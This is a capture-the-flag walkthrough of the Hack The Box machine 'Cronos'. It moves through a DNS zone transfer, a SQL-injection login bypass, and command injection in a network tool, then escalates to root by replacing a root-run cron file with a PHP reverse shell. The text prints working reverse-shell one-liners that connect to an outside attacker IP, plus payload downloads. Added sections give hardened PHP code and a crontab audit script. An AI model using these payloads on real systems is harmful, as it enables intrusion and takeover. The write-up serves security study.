Cronos
Ports scan
u505@kali:~/HTB/Machines/Chronos$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.13

Starting masscan 1.0.5 at 2020-03-18 13:08:41 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.13
Discovered open port 53/udp on 10.10.10.13
Discovered open port 53/tcp on 10.10.10.13
Discovered open port 80/tcp on 10.10.10.13

u505@kali:~/HTB/Machines/Chronos$ nmap -sC -sV 10.10.10.13
Starting Nmap 7.80 at 2020-03-18 09:08 EDT
Nmap scan report for crhonos.htb (10.10.10.13)
Host is up (0.046s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.38 seconds
Port 53
A DNS zone transfer (AXFR) is allowed to anyone, and it gives us the list of host names in the zone.
u505@kali:~/HTB/Machines/Chronos$ dig @10.10.10.13 axfr cronos.htb

; <<>> DiG 9.11.16-2-Debian <<>> @10.10.10.13 axfr cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN  SOA  cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN  NS   ns1.cronos.htb.
cronos.htb.             604800  IN  A    10.10.10.13
admin.cronos.htb.       604800  IN  A    10.10.10.13
ns1.cronos.htb.         604800  IN  A    10.10.10.13
www.cronos.htb.         604800  IN  A    10.10.10.13
cronos.htb.             604800  IN  SOA  cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 44 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Wed Mar 18 09:35:31 EDT 2020
;; XFR size: 7 records (messages 1, bytes 203)

u505@kali:~/HTB/Machines/Chronos$ cat /etc/hosts | grep "10.10.10.13 "
10.10.10.13 cronos.htb cronos admin.cronos.htb ns1.cronos.htb www.cronos.htb
Port 80
10.10.10.13
This is the Apache default page. Dirsearch didn't find anything else either.
u505@kali:~/HTB/Machines/Chronos$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "html,txt" -f -t 50 -u http://10.10.10.13
  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )
Extensions: html, txt | HTTP method: get | Threads: 50 | Wordlist size: 13784
Error Log: /opt/utils/dirsearch/logs/errors-20-03-18_09-12-46.log
Target: http://10.10.10.13
[09:12:47] Starting:
[09:12:49] 403 -  291B - /.html
[09:13:05] 403 -  292B - /icons/
[09:13:05] 200 -   12KB - /index.html
[09:13:20] 403 -  300B - /server-status/
Task Completed
www.cronos.htb and cronos.htb
This web page doesn't provide any useful information either.
u505@kali:~/HTB/Machines/Chronos$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "html,txt,php" -f -t 50 -u http://cronos.htb
  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )
Extensions: html, txt, php | HTTP method: get | Threads: 50 | Wordlist size: 18379
Error Log: /opt/utils/dirsearch/logs/errors-20-03-18_09-41-04.log
Target: http://cronos.htb
[09:41:05] Starting:
[09:41:05] 403 -  290B - /.html
[09:41:05] 403 -  289B - /.php
[09:41:20] 200 -  925B - /css/
[09:41:26] 403 -  291B - /icons/
[09:41:26] 200 -    2KB - /index.php
[09:41:26] 200 -    2KB - /index.php/
[09:41:27] 200 -  924B - /js/
[09:41:35] 200 -   24B - /robots.txt
[09:41:36] 403 -  299B - /server-status/
Task Completed
admin.cronos.htb
The web page is a PHP login screen.
u505@kali:~/HTB/Machines/Chronos$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "html,txt,php" -f -t 50 -u http://admin.cronos.htb
  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )
Extensions: html, txt, php | HTTP method: get | Threads: 50 | Wordlist size: 18379
Error Log: /opt/utils/dirsearch/logs/errors-20-03-18_09-41-22.log
Target: http://admin.cronos.htb
[09:41:22] Starting:
[09:41:23] 403 -  295B - /.php
[09:41:26] 403 -  296B - /.html
[09:41:31] 200 -    0B - /config.php
[09:41:37] 403 -  297B - /icons/
[09:41:37] 200 -    3KB - /index.php
[09:41:37] 200 -    3KB - /index.php/
[09:41:39] 302 -    0B - /logout.php  ->  index.php
[09:41:47] 403 -  305B - /server-status/
[09:41:47] 302 -    0B - /session.php  ->  index.php
[09:41:55] 302 -  439B - /welcome.php  ->  index.php
Task Completed
The pages redirect to the index page, including welcome.php, but this last one is not empty: its 302 response carries a body.
u505@kali:~/HTB/Machines/Chronos$ curl -v http://admin.cronos.htb/welcome.php
*   Trying 10.10.10.13:80...
* TCP_NODELAY set
* Connected to admin.cronos.htb (10.10.10.13) port 80 (#0)
> GET /welcome.php HTTP/1.1
> Host: admin.cronos.htb
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Wed, 18 Mar 2020 13:47:23 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: PHPSESSID=1pp39qvi5r0fbpjphbdcppvjj1; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< location: index.php
< Content-Length: 439
< Content-Type: text/html; charset=UTF-8
<
<html">
<br>
<head>
<title>Net Tool v0.1 </title>
</head>
<br>
<body>
<h1>Net Tool v0.1</h1>
<form method="POST" action="">
<select name="command">
<option value="traceroute">traceroute</option>
<option value="ping -c 1">ping</option>
</select>
<input type="text" name="host" value="8.8.8.8"/>
<input type="submit" value="Execute!"/>
</form>
<p><a href = "logout.php">Sign Out</a></p>
</body>
<br>
</html>
* Connection #0 to host admin.cronos.htb left intact
The welcome page redirects to the index page, but the server transmits the protected page anyway, without authentication.
Bypass the authentication by SQL injection
This authentication form is vulnerable to a tautological SQL injection. If we enter the user as admin' or '1'='1, the authentication is bypassed.
Bypass the authentication by tampering with the server response (alternative way)
As seen during the enumeration, the server responds with a 302 code but serves the page anyway. By tampering with the response, we can also bypass the authentication.
With Burp we intercept the response, change the 302 code to 200, and remove the Location header.
And the protected page appears.
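Both bypasses come from two defects in the same login flow: user input spliced into the SQL text, and a redirect guard that calls header() without exit. The following is an added illustration, not the machine's real source; the table and column names, the DSN and credentials are assumptions. It shows each vulnerable function beside its hardened form (prepared statement, password_verify(), exit after the redirect).

```php
<?php
// Added illustration of the two defects exploited above (constructed, not the
// box's real source). Table and column names are assumptions.

// VULNERABLE: user input is spliced into the SQL text. With the username
// admin' or '1'='1 the WHERE clause becomes a tautology, so a row is
// returned and the caller treats the login as successful.
function login_vulnerable(PDO $pdo, string $user, string $pass): bool {
    $sql = "SELECT id FROM users WHERE username='$user' AND password='$pass'";
    return $pdo->query($sql)->fetch() !== false;
}

// HARDENED: the query text is fixed, the value travels as a bound parameter
// and the password is checked with password_verify() against a stored hash.
function login_hardened(PDO $pdo, string $user, string $pass): bool {
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($pass, $row['password_hash']);
}

// VULNERABLE: header() queues a redirect but does not stop the script, so the
// protected HTML below the guard is still written into the 302 body. That is
// why curl -v received the Net Tool form together with "302 Found".
function require_login_vulnerable(): void {
    if (empty($_SESSION['loggedin'])) {
        header('Location: index.php');
    }
}

// HARDENED: terminate after the redirect; nothing after the guard is sent.
function require_login_hardened(): void {
    if (empty($_SESSION['loggedin'])) {
        header('Location: index.php');
        exit;
    }
}

// index.php request handling (hardened path)
session_start();
$pdo = new PDO('mysql:host=localhost;dbname=admin', 'app', 'secret',
               [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
if (login_hardened($pdo, $_POST['username'] ?? '', $_POST['password'] ?? '')) {
    session_regenerate_id(true);        // fresh session id after authentication
    $_SESSION['loggedin'] = true;
    header('Location: welcome.php');
    exit;
}
http_response_code(401);
```

Because the hardened guard exits, intercepting the 302 and rewriting it to 200 no longer reveals anything: the body is empty.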
Gain reverse shell
The form offers two commands, traceroute and ping. traceroute doesn't seem to do anything, but ping answers with the output of a ping.
By manipulating the host field, we can execute more commands after the traceroute or the ping.
Because we can bypass the authentication, we can manipulate the host field directly from the command line.
u505@kali:~/HTB/Machines/Cronos$ curl -X POST --data-binary 'command=traceroute&host=8.8.8.8%3B+whoami' http://admin.cronos.htb/welcome.php
<html">
<br>
<head>
<title>Net Tool v0.1 </title>
</head>
<br>
<body>
<h1>Net Tool v0.1</h1>
<form method="POST" action="">
<select name="command">
<option value="traceroute">traceroute</option>
<option value="ping -c 1">ping</option>
</select>
<input type="text" name="host" value="8.8.8.8"/>
<input type="submit" value="Execute!"/>
</form>
www-data<br>
<p><a href = "logout.php">Sign Out</a></p>
</body>
<br>
</html>
<br>
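The injection works because the host value is concatenated into a shell command string. As an added example (constructed, not the box's source; the function names and the ping/traceroute options are mine, and both binaries are assumed to be in PATH), here is the vulnerable handler beside a hardened one that maps the form value to a fixed argument list, validates the host as an IP address or plain hostname, and quotes every argument with escapeshellarg():

```php
<?php
// Added example (constructed; not the box's real source). Shows why
// host=8.8.8.8; whoami ran a second command, and a handler that cannot.

// VULNERABLE: both POST fields are pasted into one shell string, so
// "8.8.8.8; whoami" ends traceroute's arguments and starts a new command.
function run_net_tool_vulnerable(string $command, string $host): string {
    return (string) shell_exec($command . ' ' . $host);
}

// HARDENED: the command comes from a fixed allowlist keyed by the form value,
// the host must be an IP address or a plain hostname, and every argument is
// single-quoted with escapeshellarg() so shell metacharacters are inert.
// Returns null when the request is rejected.
function run_net_tool_hardened(string $command, string $host): ?string {
    $allowed = [
        'traceroute' => ['traceroute', '-m', '10'],
        'ping -c 1'  => ['ping', '-c', '1', '-W', '2'],
    ];
    if (!isset($allowed[$command])) {
        return null;                             // unknown command value
    }
    $is_ip   = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $is_name = strlen($host) <= 253 && preg_match(
        '/^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$/', $host) === 1;
    if (!$is_ip && !$is_name) {
        return null;                             // "8.8.8.8; whoami" is rejected here
    }
    // leading '-' is excluded by the checks above, so the host cannot become an option
    $argv = array_map('escapeshellarg', array_merge($allowed[$command], [$host]));
    return (string) shell_exec(implode(' ', $argv));
}

// Request handling; welcome.php's login guard must exit() before reaching here.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $out = run_net_tool_hardened($_POST['command'] ?? '', $_POST['host'] ?? '');
    if ($out === null) {
        http_response_code(400);
        echo 'Invalid command or host';
    } else {
        echo '<pre>' . htmlspecialchars($out, ENT_QUOTES, 'UTF-8') . '</pre>';
    }
}
```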
Reverse shell
Listener:
u505@kali:~/HTB/Machines/Cronos$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Send the command that opens the shell
u505@kali:~/HTB/Machines/Cronos$ . /opt/utils/urlencode/gistfile1.sh
u505@kali:~/HTB/Machines/Cronos$ curl -X POST --data-binary "command=traceroute&host=`urlencode "8.8.8.8;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.18 4444 >/tmp/f"`" http://admin.cronos.htb/welcome.php
And the reverse shell is opened.
u505@kali:~/HTB/Machines/Cronos$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.13.
Ncat: Connection from 10.10.10.13:57320.
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@cronos:/var/www/admin$ stty raw -echo
stty raw -echo
www-data@cronos:/var/www/admin$ whoami
www-data
User Flag
From the user www-data, we can access the user flag.
www-data@cronos:/var/www/admin$ ls -l /home/noulis
total 4
-r--r--r-- 1 noulis noulis 33 Mar 22  2017 user.txt
www-data@cronos:/var/www/admin$ cat /home/noulis/user.txt
<USER_FLAG>
Elevation of privileges
Upload pspy and LinEnum
Copy the tools to the www folder, and start the web server.
u505@kali:~/HTB/Machines/Cronos$ cd www/
u505@kali:~/HTB/Machines/Cronos/www$ cp /opt/utils/pspy/pspy64 ./
u505@kali:~/HTB/Machines/Cronos/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/Cronos/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
From the victim host
www-data@cronos:/var/www/admin$ cd /dev/shm
www-data@cronos:/dev/shm$ wget -q http://10.10.14.18/pspy64
www-data@cronos:/dev/shm$ wget -q http://10.10.14.18/LinEnum.sh
www-data@cronos:/dev/shm$ chmod +x pspy64 LinEnum.sh
Cronjob
LinEnum reveals an interesting cron job.
www-data@cronos:/dev/shm$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#
This job is also easily spotted with pspy64.
2020/03/21 02:57:01 CMD: UID=0    PID=5929   | php /var/www/laravel/artisan schedule:run
2020/03/21 02:57:01 CMD: UID=0    PID=5928   | /bin/sh -c php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
2020/03/21 02:57:01 CMD: UID=0    PID=5927   | /usr/sbin/CRON -f
2020/03/21 02:57:01 CMD: UID=0    PID=5935   | grep columns
2020/03/21 02:57:01 CMD: UID=0    PID=5933   | sh -c stty -a | grep columns
The artisan file is executed by root every minute, but www-data owns it, so anything www-data writes into it runs as root.
www-data@cronos:/dev/shm$ ls -l /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1646 Apr  9  2017 /var/www/laravel/artisan
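The condition that makes this cron job exploitable (root runs a file a less privileged user owns or can write) is easy to audit for. The following is an added audit script, not part of the write-up: it parses /etc/crontab entries, extracts the absolute paths each root job references, and flags those not owned by root or writable by group or others. Owner and mode lookups are passed in as callables so the constructed sample at the bottom runs offline; the live lookups need the posix extension.

```php
<?php
// Added audit script (not from the write-up): lists root crontab entries that
// reference a path not owned by root or writable by group/others, the condition
// that turned /var/www/laravel/artisan into a privilege-escalation path. Owner
// and mode lookups are injected so the constructed sample below runs offline.
function risky_root_cron_entries(string $crontab, callable $owner_of, callable $mode_of): array {
    $findings = [];
    foreach (explode("\n", $crontab) as $line) {
        $line = trim($line);
        if ($line === '' || $line[0] === '#') {
            continue;                                  // blank or comment
        }
        // system crontab layout: m h dom mon dow user command
        if (!preg_match('/^(?:\S+\s+){5}(\S+)\s+(.+)$/', $line, $m) || $m[1] !== 'root') {
            continue;                                  // VAR=value line or non-root job
        }
        $cmd = preg_replace('/\d*>>?\s*\S+/', '', $m[2]);   // drop ">> /dev/null 2>&1"
        preg_match_all('#(?<![^\s])/[^\s;&|]+#', $cmd, $paths);
        foreach (array_unique($paths[0]) as $path) {
            $owner = $owner_of($path);
            if ($owner === null) {
                continue;                              // path does not exist here
            }
            $mode = $mode_of($path);
            if ($owner !== 'root' || ($mode & 0022) !== 0) {
                $findings[] = ['path' => $path, 'owner' => $owner,
                               'mode' => sprintf('%04o', $mode), 'entry' => $line];
            }
        }
    }
    return $findings;
}

// Constructed sample: two entries from the crontab above plus an ownership table
// mirroring the ls -l output (artisan belongs to www-data).
$sample = "SHELL=/bin/sh\n"
        . "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
        . "* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1\n";
$owners = ['/' => 'root', '/etc/cron.hourly' => 'root', '/var/www/laravel/artisan' => 'www-data'];
$modes  = ['/' => 0755, '/etc/cron.hourly' => 0755, '/var/www/laravel/artisan' => 0755];
print_r(risky_root_cron_entries(
    $sample,
    function (string $p) use ($owners) { return $owners[$p] ?? null; },
    function (string $p) use ($modes)  { return $modes[$p] ?? 0; }
));
// Live lookups for a real host (posix extension required):
// $owner_of = function ($p) { return file_exists($p) ? posix_getpwuid(fileowner($p))['name'] : null; };
// $mode_of  = function ($p) { return fileperms($p) & 07777; };
```

On the sample only the artisan entry is reported; the hourly run-parts job passes because both of its paths are root-owned and not group/world-writable.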
Root reverse shell modifying artisan file
We place a PHP reverse shell in the www folder.
u505@kali:~/HTB/Machines/Cronos/www$ cp /usr/share/webshells/php/php-reverse-shell.php ./
u505@kali:~/HTB/Machines/Cronos/www$ grep CHANGE php-reverse-shell.php
$ip = '10.10.14.18';  // CHANGE THIS
$port = 4446;       // CHANGE THIS
We start the listener.
u505@kali:~/HTB/Machines/Cronos/www$ rlwrap nc -lnvp 4446
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
And upload the reverse shell to the target.
www-data@cronos:/dev/shm$ cd /var/www/laravel/
www-data@cronos:/var/www/laravel$ wget -q http://10.10.14.18/php-reverse-shell.php
And we replace the artisan file with our reverse shell.
www-data@cronos:/var/www/laravel$ mv artisan artisan.org
www-data@cronos:/var/www/laravel$ mv php-reverse-shell.php artisan
Once the cron job runs, we gain the reverse shell as root.
u505@kali:~/HTB/Machines/Cronos/www$ rlwrap nc -lnvp 4446
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Ncat: Connection from 10.10.10.13.
Ncat: Connection from 10.10.10.13:54940.
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 03:07:01 up  6:09,  0 users,  load average: 0.10, 0.03, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# python -c 'import pty; pty.spawn("/bin/bash")'
root@cronos:/# stty raw -echo
stty raw -echo
And we restore the artisan file.
www-data@cronos:/var/www/laravel$ mv artisan php-reverse-shell.php
www-data@cronos:/var/www/laravel$ mv artisan.org artisan
Root flag
root@cronos:/# cat /root/root.txt <ROOT_FLAG>
References
Daniel Simao 20:58, 18 March 2020 (EDT)